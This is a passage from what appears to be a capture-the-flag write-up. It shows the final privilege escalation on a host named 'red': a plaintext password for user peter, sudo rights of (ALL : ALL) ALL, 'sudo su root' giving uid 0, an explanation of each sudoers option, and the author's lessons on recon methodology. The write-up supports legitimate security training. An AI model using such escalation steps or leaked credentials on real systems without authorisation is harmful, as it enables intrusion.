    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for peter: JZQuyIN5
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
    (ALL : ALL) ALL
peter@red ~ % sudo su root                                                     
sudo su root
➜  peter id                                                                    
id
uid=0(root) gid=0(root) groups=0(root)

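In the end we have root.

This output is the sudo privilege configuration for user peter on host red. Going through the entries one by one:

  1. Defaults entries for peter on red:

    • lecture=always : this option specifies that whenever user peter uses sudo, the system should always display the authorization and warning message.
    • env_reset : this option specifies that when a sudo command runs, environment variables should be reset to safe defaults to avoid potential security problems.
    • mail_badpass : this option specifies that if the user enters a wrong password when trying to use sudo, the system should notify the administrator by mail.
    • secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin : this option specifies the command paths user peter can access when using sudo. The paths listed are the safe system default paths, and the user can run commands in them.
  2. User peter may run the following commands on red:

    • (ALL : ALL) ALL : this entry specifies that user peter has full sudo privileges on host red. Specifically, it means peter can, as any user (ALL), on any terminal (ALL), run any command (ALL).

In summary, this configuration lets user peter on host red use sudo to run any command as any user; the system always displays the authorization and warning message, environment variables are reset to safe defaults, and a wrong password is reported to the administrator by mail. Such a configuration is very powerful and should be used with care, making sure that only authorized users hold this privilege.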

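# Takeaways

My approach was disorganized. Information gathering is not a one-off step but a loop repeated many times, and I was too constrained by the initial round. From now on I will not do a single up-front summary pass; I will gather information as I go deeper and put the summarized information separately at the end.

I was also too lazy: unwilling to read code written by others and unwilling to experiment. That comes from not being fluent with the tools themselves and not having built up an attack workflow of my own, so every new finding meant switching between different tools over and over, which in turn bred laziness.

All of this takes gradual practice, though; only by doing a lot of hands-on work does it get easier.

Let's keep at it together!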